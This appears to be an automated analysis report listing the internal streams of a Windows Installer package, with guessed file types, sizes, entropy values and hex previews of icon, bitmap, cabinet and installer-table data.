Stream Path: \x17163\x16689\x18229\x17790\x17640\x17188\x17205\x18470, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32, Stream Size: 2998

General
Stream Path:	\x17163\x16689\x18229\x17790\x17640\x17188\x17205\x18470
File Type:	MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
Stream Size:	2998
Entropy:	4.6676615263
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . . . . p . . . . . . . . . . x . { . w p . . . . . . . . ( . . . { . w . . . . . . . . . ( x x x . . . . . . . . . . .
Data Raw:	00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00

Stream Path: \x17163\x16689\x18229\x17918\x16740\x16677\x17318, File Type: PC bitmap, Windows 3.x format, 1 x 200 x 24, Stream Size: 854

General
Stream Path:	\x17163\x16689\x18229\x17918\x16740\x16677\x17318
File Type:	PC bitmap, Windows 3.x format, 1 x 200 x 24
Stream Size:	854
Entropy:	3.80253159876
Base64 Encoded:	False
Data ASCII:	B M V . . . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	42 4d 56 03 00 00 00 00 00 00 36 00 00 00 28 00 00 00 01 00 00 00 c8 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ef f3 f4 00 ef f3 f4 00 ef f3 f4 00 ef f4 f4 00 ef f4 f4 00 ef f4 f5 00 ef f4 f5 00 ef f4 f5 00 ef f4

Stream Path: \x17191\x17334\x18305\x16678\x18469, File Type: Microsoft Cabinet archive data, 67 bytes, 1 file, Stream Size: 67

General
Stream Path:	\x17191\x17334\x18305\x16678\x18469
File Type:	Microsoft Cabinet archive data, 67 bytes, 1 file
Stream Size:	67
Entropy:	2.40590681346
Base64 Encoded:	False
Data ASCII:	M S C F . . . . C . . . . . . . , . . . . . . . . . . . . . . . . . . . C . . . . . . . . . . . . . . . . . . S k . . o k . t x t .
Data Raw:	4d 53 43 46 00 00 00 00 43 00 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 d2 04 00 00 43 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 17 53 6b 93 20 00 6f 6b 2e 74 78 74 00

Stream Path: \x18496\x15167\x17394\x17464\x17841, File Type: data, Stream Size: 1480

General
Stream Path:	\x18496\x15167\x17394\x17464\x17841
File Type:	data
Stream Size:	1480
Entropy:	4.95133031199
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . ( . ( . ( . ( . ( . ( . ( . ( . 3 . 3 . 3 . 3 . 3 . 3 . 3 . 3 . 3 . 3 . = . = . A . A . F . F . F . F . F . F . F . O . O . O . R . R . R . T . T . T . V . V . Z . Z . Z . Z . Z . Z . Z . Z . Z . ] . ] . a . a . a . a . a . a . e . e . e . e . e . k . k . k . k . k . m . m . m . n . n . n . n . r . r . r . r . r . r . u . u . u . u . u . u . u . u . u . u . u . u . x . x . x . x . x . \| . \| . \| . \| . . . . . . . . . . . . . . . . . . . . .
Data Raw:	04 00 04 00 04 00 04 00 04 00 04 00 07 00 07 00 07 00 11 00 11 00 11 00 1b 00 1b 00 20 00 20 00 28 00 28 00 28 00 28 00 28 00 28 00 28 00 28 00 28 00 33 00 33 00 33 00 33 00 33 00 33 00 33 00 33 00 33 00 33 00 3d 00 3d 00 41 00 41 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 4f 00 4f 00 4f 00 52 00 52 00 52 00 54 00 54 00 54 00 56 00 56 00 5a 00 5a 00 5a 00 5a 00 5a 00 5a 00 5a 00

Stream Path: \x18496\x15518\x16925\x17915, File Type: data, Stream Size: 444

General
Stream Path:	\x18496\x15518\x16925\x17915
File Type:	data
Stream Size:	444
Entropy:	5.39602943801
Base64 Encoded:	False
Data ASCII:	O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . # . % . ' . ) . + . - . / . 0 . 2 . 5 . 7 . 9 . ; . = . ? . A . C . E . G . I . K . M . O . Q . S . U . W . Y . [ . ] . _ . a . c . e . f . h . j . l . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	4f 01 9d 06 9f 06 a0 06 a2 06 a4 06 a6 06 a7 06 a9 06 aa 06 ab 06 ad 06 ae 06 b0 06 b2 06 b3 06 b5 06 b7 06 b9 06 bb 06 bd 06 bf 06 c1 06 c3 06 c5 06 c7 06 c9 06 cb 06 cd 06 cf 06 d1 06 d3 06 d5 06 d6 06 d8 06 da 06 dc 06 de 06 e0 06 e2 06 e4 06 e6 06 e8 06 ea 06 ec 06 ee 06 f0 06 f2 06 f4 06 f6 06 f8 06 fa 06 fc 06 fe 06 00 07 02 07 04 07 06 07 08 07 0a 07 0c 07 0e 07 10 07 11 07

Stream Path: \x18496\x16191\x17783\x17516\x15210\x17892\x18468, File Type: ISO-8859 text, with very long lines, Stream Size: 92636

General
Stream Path:	\x18496\x16191\x17783\x17516\x15210\x17892\x18468
File Type:	ISO-8859 text, with very long lines
Stream Size:	92636
Entropy:	4.81150481133
Base64 Encoded:	True
Data ASCII:	A t t r i b u t e s P a t c h S i z e F i l e _ P a t c h T y p e A c t i o n C o n d i t i o n S e q u e n c e C o s t F i n a l i z e C o s t I n i t i a l i z e T a b l e N a m e I n s t a l l F i n a l i z e I n s t a l l I n i t i a l i z e I n s t a l l V a l i d a t e A d v t E x e c u t e S e q u e n c e C r e a t e S h o r t c u t s M s i P u b l i s h A s s e m b l i e s P u b l i s h C o m p o n e n t s P u b l i s h F e a t u r e s P u b l i s h P r o d u c t R e g i s t e r C l a s s I n f o R
Data Raw:	41 74 74 72 69 62 75 74 65 73 50 61 74 63 68 53 69 7a 65 46 69 6c 65 5f 50 61 74 63 68 54 79 70 65 41 63 74 69 6f 6e 43 6f 6e 64 69 74 69 6f 6e 53 65 71 75 65 6e 63 65 43 6f 73 74 46 69 6e 61 6c 69 7a 65 43 6f 73 74 49 6e 69 74 69 61 6c 69 7a 65 54 61 62 6c 65 4e 61 6d 65 49 6e 73 74 61 6c 6c 46 69 6e 61 6c 69 7a 65 49 6e 73 74 61 6c 6c 49 6e 69 74 69 61 6c 69 7a 65 49 6e 73 74 61

Stream Path: \x18496\x16191\x17783\x17516\x15978\x17586\x18479, File Type: data, Stream Size: 7612

General
Stream Path:	\x18496\x16191\x17783\x17516\x15978\x17586\x18479
File Type:	data
Stream Size:	7612
Entropy:	3.48860591649
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 . . . . . . . j . . . = .
Data Raw:	e4 04 00 00 0a 00 0e 00 09 00 02 00 05 00 02 00 05 00 0d 00 04 00 04 00 06 00 12 00 09 00 28 00 08 00 10 00 0c 00 06 00 0e 00 06 00 00 00 00 00 05 00 02 00 04 00 04 00 0f 00 03 00 11 00 03 00 0f 00 04 00 13 00 07 00 0f 00 03 00 14 00 03 00 11 00 03 00 0f 00 01 00 0e 00 01 00 11 00 03 00 15 00 03 00 10 00 03 00 12 00 03 00 0c 00 05 00 07 00 02 00 06 00 02 00 06 00 02 00 0a 00 02 00

Stream Path: \x18496\x16255\x16740\x16943\x18486, File Type: data, Stream Size: 80

General
Stream Path:	\x18496\x16255\x16740\x16943\x18486
File Type:	data
Stream Size:	80
Entropy:	3.85311981951
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . ( . 3 . = . A . F . O . R . T . V . Z . ] . a . e . k . m . n . r . u . x . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	04 00 07 00 11 00 1b 00 20 00 28 00 33 00 3d 00 41 00 46 00 4f 00 52 00 54 00 56 00 5a 00 5d 00 61 00 65 00 6b 00 6d 00 6e 00 72 00 75 00 78 00 7c 00 7f 00 81 00 83 00 85 00 8b 00 8d 00 95 00 97 00 99 00 b3 00 f5 00 f9 00 13 01 14 01 1f 01

Stream Path: \x18496\x16383\x17380\x16876\x17892\x17580\x18481, File Type: data, Stream Size: 4440

General
Stream Path:	\x18496\x16383\x17380\x16876\x17892\x17580\x18481
File Type:	data
Stream Size:	4440
Entropy:	2.60463045951
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . ( . ( . ( . ( . ( . ( . ( . ( . 3 . 3 . 3 . 3 . 3 . 3 . 3 . 3 . 3 . 3 . = . = . A . A . F . F . F . F . F . F . F . O . O . O . R . R . R . T . T . T . V . V . Z . Z . Z . Z . Z . Z . Z . Z . Z . ] . ] . a . a . a . a . a . a . e . e . e . e . e . k . k . k . k . k . m . m . m . n . n . n . n . r . r . r . r . r . r . u . u . u . u . u . u . u . u . u . u . u . u . x . x . x . x . x . \| . \| . \| . \| . . . . . . . . . . . . . . . . . . . . .
Data Raw:	04 00 04 00 04 00 04 00 04 00 04 00 07 00 07 00 07 00 11 00 11 00 11 00 1b 00 1b 00 20 00 20 00 28 00 28 00 28 00 28 00 28 00 28 00 28 00 28 00 28 00 33 00 33 00 33 00 33 00 33 00 33 00 33 00 33 00 33 00 33 00 3d 00 3d 00 41 00 41 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 4f 00 4f 00 4f 00 52 00 52 00 52 00 54 00 54 00 54 00 56 00 56 00 5a 00 5a 00 5a 00 5a 00 5a 00 5a 00 5a 00

Stream Path: \x18496\x16661\x17528\x17126\x17548\x16881\x17900\x17580\x18481, File Type: data, Stream Size: 28

General
Stream Path:	\x18496\x16661\x17528\x17126\x17548\x16881\x17900\x17580\x18481
File Type:	data
Stream Size:	28
Entropy:	2.90367746103
Base64 Encoded:	False
Data ASCII:	u . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	75 06 87 06 8a 06 8c 06 8e 06 90 06 92 06 89 06 88 06 8b 06 8d 06 8f 06 91 06 93 06

Stream Path: \x18496\x16667\x17191\x15090\x17912\x17591\x18481, File Type: MIPSEB-LE MIPS-II ECOFF executable not stripped - version 129.64, Stream Size: 36

General
Stream Path:	\x18496\x16667\x17191\x15090\x17912\x17591\x18481
File Type:	MIPSEB-LE MIPS-II ECOFF executable not stripped - version 129.64
Stream Size:	36
Entropy:	3.62798680688
Base64 Encoded:	False
Data ASCII:	c . c . . . . . d . . . . . . . . . . . @ . @ . . . . . . . . . . . . .
Data Raw:	63 01 63 01 01 80 02 80 64 01 96 06 05 80 05 80 05 80 19 80 40 81 40 81 14 80 0f 80 95 06 97 06 00 00 00 00

Stream Path: \x18496\x16778\x17207\x17522\x16925\x17915, File Type: data, Stream Size: 420

General
Stream Path:	\x18496\x16778\x17207\x17522\x16925\x17915
File Type:	data
Stream Size:	420
Entropy:	4.68508358816
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . V . N . . . . . . . . . . . . . . . . . . . . . . . . $ . ' . * . + . . . 0 . 2 . 4 . 6 . 9 . < . > . C . F . H . J . N . R . W . Z . ] . _ . f . i . l . n . q . s . v . x . z . \| . . . . . . . . . . . . . . . . . . . . . . . . . # . # . A . . . . . L . P . T . U . . . b . d . . . B . . . . . . . . . . . . . . . . . . . . . . . ! . % . ( . # . , . / . 1 . 3 . 5 . 7 . : . = . ? . D . G . I . K . O . S . X . [ . ^ . ` . g . j . m . o . r . t . w . y . { . } .
Data Raw:	09 00 0a 00 10 00 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00 1a 00 56 00 4e 01 fe 01 00 02 05 02 0a 02 0c 02 11 02 13 02 18 02 1a 02 1d 02 1e 02 20 02 24 02 27 02 2a 02 2b 02 2e 02 30 02 32 02 34 02 36 02 39 02 3c 02 3e 02 43 02 46 02 48 02 4a 02 4e 02 52 02 57 02 5a 02 5d 02 5f 02 66 02 69 02 6c 02 6e 02 71 02 73 02 76 02 78 02 7a 02 7c 02 7f 02 81 02 83 02 85 02 87 02 89 02

Stream Path: \x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 48

General
Stream Path:	\x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934
File Type:	data
Stream Size:	48
Entropy:	3.38186998233
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . * . 0 . 4 . . . . . . . . . . . . . . . . . . . . . . . . x . . . < . . .
Data Raw:	09 00 0a 00 0e 00 0f 00 10 00 2a 02 30 02 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 c8 99 dc 85 78 85 84 83 3c 8f a0 8f

Stream Path: \x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 66

General
Stream Path:	\x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472
File Type:	data
Stream Size:	66
Entropy:	3.77043919502
Base64 Encoded:	False
Data ASCII:	. . . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	09 00 0a 00 2a 02 96 02 97 02 98 02 99 02 9a 02 9b 02 9c 02 9d 02 00 00 00 00 00 00 00 00 00 00 66 01 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 84 83 00 85 ce 84 01 80 14 85 ff 7f fd 7f 8c 80 fe 7f

Stream Path: \x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 72

General
Stream Path:	\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
File Type:	data
Stream Size:	72
Entropy:	3.44607361183
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . j . 8 . . . \\ . $ . . .
Data Raw:	09 00 0a 00 0e 00 0f 00 10 00 12 00 13 00 14 00 17 00 18 00 19 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 c8 99 dc 85 78 85 94 91 6a 98 38 98 f8 91 5c 92 24 93 c0 92

Stream Path: \x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486, File Type: data, Stream Size: 16

General
Stream Path:	\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
File Type:	data
Stream Size:	16
Entropy:	2.0
Base64 Encoded:	False
Data ASCII:	# . # . # . # . $ . % . & . ' .
Data Raw:	23 00 23 00 23 00 23 00 24 00 25 00 26 00 27 00

Stream Path: \x18496\x16911\x17892\x17784\x18472, File Type: data, Stream Size: 16

General
Stream Path:	\x18496\x16911\x17892\x17784\x18472
File Type:	data
Stream Size:	16
Entropy:	2.22460175271
Base64 Encoded:	False
Data ASCII:	# . . . # . < . . . . . & . . .
Data Raw:	23 00 00 00 23 00 3c 00 01 80 01 80 26 00 00 80

Stream Path: \x18496\x16918\x17191\x18468, File Type: MIPSEB Ucode, Stream Size: 14

General
Stream Path:	\x18496\x16918\x17191\x18468
File Type:	MIPSEB Ucode
Stream Size:	14
Entropy:	1.80735492206
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . .
Data Raw:	01 80 01 00 00 80 00 00 94 06 00 00 00 00

Stream Path: \x18496\x16923\x17194\x17910\x18229, File Type: data, Stream Size: 12

General
Stream Path:	\x18496\x16923\x17194\x17910\x18229
File Type:	data
Stream Size:	12
Entropy:	2.35538854221
Base64 Encoded:	False
Data ASCII:	% . . . J . K . . . % .
Data Raw:	25 00 01 80 4a 01 4b 01 00 00 25 00

Stream Path: \x18496\x16925\x17915\x17884\x17404\x18472, File Type: data, Stream Size: 48

General
Stream Path:	\x18496\x16925\x17915\x17884\x17404\x18472
File Type:	data
Stream Size:	48
Entropy:	3.09028891162
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	dc 01 98 06 9b 06 9c 06 9a 06 99 06 9a 06 9a 06 08 80 0d 80 08 80 08 80 00 00 00 80 00 00 00 80 00 00 00 80 ff ff ff 80 00 80 01 80 01 80 00 80

Stream Path: \x18496\x17100\x16808\x15086\x18162, File Type: data, Stream Size: 12

General
Stream Path:	\x18496\x17100\x16808\x15086\x18162
File Type:	data
Stream Size:	12
Entropy:	2.221251836
Base64 Encoded:	False
Data ASCII:	. . . . . . f . f . f .
Data Raw:	83 01 f1 01 a2 02 66 01 66 01 66 01

Stream Path: \x18496\x17163\x16689\x18229, File Type: 370 sysV executable, Stream Size: 60

General
Stream Path:	\x18496\x17163\x16689\x18229
File Type:	370 sysV executable
Stream Size:	60
Entropy:	2.7112204457
Base64 Encoded:	False
Data ASCII:	] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	5d 01 d8 01 da 01 e0 01 e2 01 e4 01 e6 01 e8 01 ea 01 ec 01 ee 01 f5 01 9f 02 a0 02 a1 02 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00

Stream Path: \x18496\x17165\x16949\x17894\x17778\x18492, File Type: data, Stream Size: 30

General
Stream Path:	\x18496\x17165\x16949\x17894\x17778\x18492
File Type:	data
Stream Size:	30
Entropy:	3.21925091284
Base64 Encoded:	False
Data ASCII:	$ . & . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	24 00 26 00 a7 02 f9 02 e5 03 f9 02 f9 02 f9 02 00 00 f9 02 e4 03 e2 03 e3 03 e1 03 e6 03

Stream Path: \x18496\x17165\x17380\x17074, File Type: data, Stream Size: 616

General
Stream Path:	\x18496\x17165\x17380\x17074
File Type:	data
Stream Size:	616
Entropy:	4.22136508176
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ' . D . N . T . X . [ . ` . d . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . . . r . r . r . r . r . r . r . . . r . r . r . r . r . r . r . ( . r . r . r . r . r . r . r . r . r . r . . . i . . . . . . . . . . . . . . . U . . . . . . . . . . . . . . .
Data Raw:	a0 01 96 02 97 02 9a 02 9b 02 9c 02 9d 02 a8 02 ad 02 bd 02 d1 02 d2 02 d4 02 d6 02 da 02 f3 02 f6 02 07 03 0c 03 12 03 27 03 44 03 4e 03 54 03 58 03 5b 03 60 03 64 03 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80

Stream Path: \x18496\x17167\x16943, File Type: data, Stream Size: 20

General
Stream Path:	\x18496\x17167\x16943
File Type:	data
Stream Size:	20
Entropy:	1.57889790299
Base64 Encoded:	False
Data ASCII:	' . ' . 2 . . . . . . . . . . . . . . .
Data Raw:	27 00 27 00 32 00 00 00 00 80 00 00 00 00 00 80 01 00 00 80

Stream Path: \x18496\x17180\x17514\x17892\x17784\x18472, File Type: data, Stream Size: 26

General
Stream Path:	\x18496\x17180\x17514\x17892\x17784\x18472
File Type:	data
Stream Size:	26
Entropy:	1.37587964515
Base64 Encoded:	False
Data ASCII:	1 . 2 . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	31 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 88 ae d1 d2 00 00 00 00 00 00

Stream Path: \x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 432

General
Stream Path:	\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
File Type:	data
Stream Size:	432
Entropy:	5.63728045061
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . V . N . . . . . . . . . . . . $ . ' . * . + . 2 . 4 . 6 . 9 . < . C . F . H . J . W . Z . ] . _ . f . i . n . q . s . v . x . z . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v . x . . . . . . . . . . . . . . . . . . . . . { . . . . . . . t . . . u . t . . . z . . . u . . . . . . . z . . . z . . . w . . . . . z . . . . . . . z . . . . . . . . . w . \| . . . . . } . . . z . z . u . u . z . . . z . z . z . z .
Data Raw:	09 00 0a 00 0e 00 0f 00 10 00 12 00 13 00 14 00 17 00 18 00 19 00 1a 00 56 00 4e 01 fe 01 00 02 0c 02 18 02 1a 02 20 02 24 02 27 02 2a 02 2b 02 32 02 34 02 36 02 39 02 3c 02 43 02 46 02 48 02 4a 02 57 02 5a 02 5d 02 5f 02 66 02 69 02 6e 02 71 02 73 02 76 02 78 02 7a 02 7c 02 7f 02 81 02 83 02 85 02 87 02 89 02 8b 02 8d 02 8f 02 91 02 93 02 95 02 ba 03 c0 03 c2 03 c7 03 c9 03 cb 03

Stream Path: \x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 192

General
Stream Path:	\x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472
File Type:	data
Stream Size:	192
Entropy:	5.01804010506
Base64 Encoded:	False
Data ASCII:	. . . . V . N . * . + . C . . . . . . . . . . . . . . . . . [ . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . p . . . . . . . t . . . z . ~ . . . . d . . . . . . . L . . . . . . . . . K . . . . . . . . . . . 4 . 3 . c . . . e . . . 5 . . . . . . . . . . . . . . . . .
Data Raw:	09 00 0a 00 56 00 4e 01 2a 02 2b 02 43 02 96 02 99 02 9a 02 9b 02 9c 02 9d 02 d6 02 f3 02 5b 03 60 03 b8 03 ba 03 bd 03 c0 03 c4 03 c7 03 c9 03 ce 03 d0 03 d5 03 d8 03 d9 03 da 03 db 03 dc 03 00 00 00 00 00 00 74 06 00 00 00 00 00 00 00 00 00 00 84 06 00 00 00 00 85 06 80 03 81 03 85 03 86 03 00 00 00 00 00 00 86 06 be 03 70 06 00 00 70 06 7f 06 86 03 83 06 74 06 82 06 7a 06 7e 06

Stream Path: \x18496\x17547\x17906\x17910\x16693\x17651\x17768\x15518\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 54

General
Stream Path:	\x18496\x17547\x17906\x17910\x16693\x17651\x17768\x15518\x16924\x17972\x17512\x16934
File Type:	data
Stream Size:	54
Entropy:	3.98171100572
Base64 Encoded:	False
Data ASCII:	V . M . N . O . Q . R . T . U . V . L . L . L . P . P . S . S . P . W . . . , . ^ . . . . . X . . . . . .
Data Raw:	56 00 4d 01 4e 01 4f 01 51 01 52 01 54 01 55 01 56 01 4c 01 4c 01 4c 01 50 01 50 01 53 01 53 01 50 01 57 01 fa 80 2c 81 5e 81 90 81 c2 81 58 82 8a 82 bc 82 20 83

Stream Path: \x18496\x17548\x17648\x17522\x17512\x18487, File Type: data, Stream Size: 48

General
Stream Path:	\x18496\x17548\x17648\x17522\x17512\x18487
File Type:	data
Stream Size:	48
Entropy:	2.65988691751
Base64 Encoded:	False
Data ASCII:	$ . % . & . ' . . . . . . . . . $ . & . & . . . . . . . . . . . . . . . . . . . . . % . . . ' .
Data Raw:	24 00 25 00 26 00 27 00 a5 02 a4 02 a3 02 a6 02 24 00 26 00 26 00 a7 02 00 80 04 80 00 80 00 80 00 00 00 00 00 00 00 00 00 00 25 00 00 00 27 00

Stream Path: \x18496\x17548\x17905\x17589\x15151\x17522\x17191\x17207\x17522, File Type: data, Stream Size: 72

General
Stream Path:	\x18496\x17548\x17905\x17589\x15151\x17522\x17191\x17207\x17522
File Type:	data
Stream Size:	72
Entropy:	3.373933168
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . @ . A . . . . . . . y . y . y . y . } . } . y . y . y . \| . \| . { . { . ~ . ~ . z . z . z .
Data Raw:	9a 02 9a 02 9a 02 9a 02 9b 02 9b 02 12 03 12 03 12 03 b6 02 b8 02 ba 02 bc 02 40 03 41 03 c3 02 1a 03 1c 03 79 03 79 03 79 03 79 03 7d 03 7d 03 79 03 79 03 79 03 7c 03 7c 03 7b 03 7b 03 7e 03 7e 03 7a 03 7a 03 7a 03

Stream Path: \x18496\x17548\x17905\x17589\x15279\x16953\x17905, File Type: data, Stream Size: 1536

General
Stream Path:	\x18496\x17548\x17905\x17589\x15279\x16953\x17905
File Type:	data
Stream Size:	1536
Entropy:	4.92138164359
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ' . D . D . D . N . N . N . T . X . X . X . [ . [ . [ . [ . ` . ` . ` . ` . ` . ` . d .
Data Raw:	a0 01 a0 01 a0 01 a0 01 a0 01 a0 01 a0 01 96 02 97 02 97 02 97 02 9a 02 9a 02 9a 02 9a 02 9b 02 9b 02 9b 02 9c 02 9d 02 9d 02 a8 02 a8 02 a8 02 a8 02 a8 02 a8 02 ad 02 ad 02 bd 02 bd 02 bd 02 bd 02 bd 02 bd 02 d1 02 d1 02 d1 02 d1 02 d1 02 d1 02 d1 02 d1 02 d1 02 d1 02 d1 02 d1 02 d2 02 d2 02 d2 02 d2 02 d2 02 d2 02 d2 02 d4 02 d4 02 d4 02 d4 02 d4 02 d4 02 d4 02 d4 02 d6 02 d6 02

Stream Path: \x18496\x17548\x17905\x17589\x18479, File Type: data, Stream Size: 7280

General
Stream Path:	\x18496\x17548\x17905\x17589\x18479
File Type:	data
Stream Size:	7280
Entropy:	4.52877735724
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	a0 01 a0 01 a0 01 a0 01 a0 01 a0 01 a0 01 a0 01 a0 01 96 02 96 02 96 02 96 02 96 02 96 02 96 02 96 02 96 02 96 02 96 02 96 02 97 02 97 02 97 02 97 02 97 02 97 02 97 02 9a 02 9a 02 9a 02 9a 02 9a 02 9a 02 9a 02 9a 02 9a 02 9a 02 9a 02 9b 02 9b 02 9b 02 9b 02 9b 02 9b 02 9b 02 9b 02 9b 02 9b 02 9c 02 9c 02 9c 02 9c 02 9c 02 9c 02 9c 02 9c 02 9c 02 9d 02 9d 02 9d 02 9d 02 9d 02 9d 02

